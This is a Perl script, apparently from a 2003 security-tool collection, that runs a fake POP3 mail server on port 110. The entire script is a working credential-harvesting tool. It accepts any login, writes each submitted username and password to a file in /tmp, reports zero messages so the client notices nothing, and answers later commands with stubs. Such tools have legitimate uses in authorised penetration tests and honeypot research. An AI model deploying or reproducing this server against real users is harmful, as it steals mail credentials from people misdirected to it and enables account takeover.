Untitled

#!/usr/bin/perl
#
# Fake pop3 server wich just logs user/password into a file and
# tells that there are no messages waiting.
#
# This example daemon was partially on my disk and i have just
# Modify it to work corretly on this purpose
#
# mmo@remote-exploit.org 2003

$MLEM="\r\n.\r\n";#Multi Line End Marker

$logfile="/tmp/pop3-captured-passwords.txt";

use Socket;
use Fcntl ':flock';
use IO::Handle;
use IO::Socket;
use Carp;

$door = IO::Socket::INET->new(
                                Proto     => 'tcp',
                                LocalPort => 110,
                                Listen    => SOMAXCONN,
                                Reuse     => 1
);

die "Cannot set up socket: $!" unless $door;

$timeout = 60;
$SIG{ALRM} = sub { die "alarm or timeout\n" };

sub SockData($){
        my $client = shift;
        my $hersockaddr    = getpeername($client);
        my ($port, $iaddr) = unpack_sockaddr_in($hersockaddr);
        my $herhostname    = gethostbyaddr($iaddr, AF_INET);
        my $herstraddr     = inet_ntoa($iaddr);
        return "$herhostname $herstraddr";
};


# from perldoc perlipc:

 sub REAPER {
	$waitedpid = wait;
	print "Reaped $waitedpid and got status [ $? ] \n";

 	$SIG{CHLD} = \&REAPER;  # still loathe sysV
}
$SIG{CHLD} = \&REAPER;	# setting it to 'IGNORE' may work: YMMV


for(;;){
                until(  $client = $door->accept()){
                        print "Accepted false socket $!";
			sleep 1;
                };
		$F = fork;
		die "Fork weirdness: $!" if $F < 0;

                if($F){
			close $client;
			next;
		};

                # here we are in a new process

                close ($door);

                $client->autoflush();
		print "$$ New Connection ".SockData($client)."\n";
		&AUTHORIZATION;
		print "$$ authorized\n";
		&TRANSACTION;
		print "$$ done\n";
		exit;
};


sub OK($){
	my $A = shift;
        $A =~ s/\s+/ /g;
        $A =~ s/\s+\Z//g;
        print $client "+OK $A\r\n";
        print "S: +OK $A\r\n";
	alarm $timeout;
};

sub ERR($){
	my $A = shift;
        $A =~ s/\s+/ /g;
        $A =~ s/\s+\Z//g;
        print $client "-ERR $A\r\n";
        print "S: -ERR $A\r\n";
	alarm $timeout;
};

sub AUTHORIZATION{
	$cuname='';
	$cpass='';
	$Name = '';
	OK "POP3 Daemon ".SockData($client).scalar(localtime);
	NEEDUSER:
        $Data = <$client>;
	print "C:$Data\n";
	if ($Data =~ m/^quit/i){
		OK "+";
		exit;
	};
        ($Name) =  $Data =~ m/^user (\w+)/i;
	unless($Name){
		ERR "-";
		die if ++$strikes > 5;
		goto NEEDUSER;
	};
	OK "User name ($Name) ok. Password, please.";
	$cuname=$Name;
        $Data = <$client>;
	print "C:$Data\n";
	if ($Data =~ m/^quit/i){
		OK "+";
		exit;
	};
	if ($Data =~ m/^pass (.*)/i)
	{
                my $Pass = $1;
		$Pass =~ s/\s+\Z//g;

		open(DATEI,">>$logfile") || die "Could not open $logfile";
                print DATEI scalar(localtime) . " pop3 - user: $cuname password $Pass \n";
                close (DATEI);

		#`echo "pop3 - user: $cuname password: $Pass" >> $logfile`;
		OK "$Name has 0 messages";
        }
	else
	{
                ERR "-";
                die if ++$strikes > 5;
                goto NEEDUSER;
        };


};

sub TRANSACTION{
	%deletia = ();
	START:
        $_ = $Data = <$client>;
	unless(defined($Data)){
		print "Client closed connection\n";
		exit;
	};
	print "C:$Data\n";
	if (m/^quit/i){
		OK "Exiting now";
		return;
	};
	if (m/^STAT/i){ &STAT; goto START};
	if (m/^LIST/i){ &NOOP; goto START};
	if (m/^RETR/i){ &NOOP; goto START};
	if (m/^DELE/i){ &NOOP; goto START};
	if (m/^NOOP/i){ &NOOP; goto START};
	if (m/^RSET/i){ &RSET; goto START};
	# optional commands (rfc 1725)
	if (m/^TOP/i){ &NOOP; goto START};
	if (m/^UIDL/i){ &NOOP; goto START};


	ERR "-";

	goto START;
}

sub STAT{
	alarm 0;	#who knows how long reading the dir will take?
	$mm = 0;
	$nn = 0;
	OK "$nn $mm";
};

sub NOOP{
	OK "+";
};

sub RSET{
	%deletia=();
	OK "+";
};

__END__